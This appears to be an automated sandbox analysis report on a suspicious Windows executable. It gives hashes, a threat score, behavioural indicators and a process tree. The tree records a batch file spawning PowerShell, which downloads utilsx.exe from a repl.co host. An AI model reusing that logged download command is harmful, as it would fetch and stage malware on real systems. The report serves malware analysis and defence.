4b45a2333b183144267f5492c7dae553b28ad86d03a96891efb0fb04359d67e4

Analysis

max time kernel
142s
max time network
136s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
03-08-2023 06:38

Target

96c30f7179f2d7045aba556d3b8f92af.exe
Size

122KB
MD5

96c30f7179f2d7045aba556d3b8f92af
SHA1

d67b625b55c6eebd2295e3320ffc9e62d4523a91
SHA256

4b45a2333b183144267f5492c7dae553b28ad86d03a96891efb0fb04359d67e4
SHA512

17e0a714f9b041195c36440ae0afda119ff919f282df7e9e0001cfddd1009736dc0af4d58ef697ca52a174ec19ada046e0f18f70bd1709c8f8dd8ede747a086a
SSDEEP

3072:w/25jvDSgsqsb5Uh28vAbTV1WW69B9VjMdxPedN9ug0z9TBfFSEj:Ltzsb5Uh28+V1WW69B9VjMdxPedN9ugC

Score

8^/10

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	748	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
748	powershell.exe
748	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	748	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4008 wrote to memory of 1860	4008	96c30f7179f2d7045aba556d3b8f92af.exe	85
PID 4008 wrote to memory of 1860	4008	96c30f7179f2d7045aba556d3b8f92af.exe	85
PID 1860 wrote to memory of 748	1860	cmd.exe	86
PID 1860 wrote to memory of 748	1860	cmd.exe	86

C:\Users\Admin\AppData\Local\Temp\96c30f7179f2d7045aba556d3b8f92af.exe
"C:\Users\Admin\AppData\Local\Temp\96c30f7179f2d7045aba556d3b8f92af.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4008
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B91E.tmp\B91F.tmp\B920.bat C:\Users\Admin\AppData\Local\Temp\96c30f7179f2d7045aba556d3b8f92af.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Invoke-Webrequest -URI "https://vfileserver.luiswilfredowil.repl.co/utilsx.exe" -OutFile "C:/Users/Admin/Desktop/utilsx/utilsx.exe"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:748

C:\Users\Admin\AppData\Local\Temp\B91E.tmp\B91F.tmp\B920.bat

Filesize
197B

MD5
357324c3dee28a16a77699ead1f205ae

SHA1
a8de60d51730031d4e822103559f10ba835591f9

SHA256
b61db88b668aebc41fab8f2de6327ceb95313279829317cdca1facfd6b60b087

SHA512
759c4e970be66153adb0d1f68ab0559dd03f62ac5d4e21439d337b90d16671ceee19679ab1595d911dedee391714d3ecf4f1539136a320f87cea6e57fa26092c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y3ifivhc.xtx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/748-135-0x000002AADABF0000-0x000002AADAC12000-memory.dmp

Filesize
136KB

Download
memory/748-145-0x00007FFC8A1E0000-0x00007FFC8ACA1000-memory.dmp

Filesize
10.8MB

Download
memory/748-146-0x000002AADAC30000-0x000002AADAC40000-memory.dmp

Filesize
64KB

Download
memory/748-147-0x000002AADAC30000-0x000002AADAC40000-memory.dmp

Filesize
64KB

Download
memory/748-150-0x00007FFC8A1E0000-0x00007FFC8ACA1000-memory.dmp

Filesize
10.8MB

Download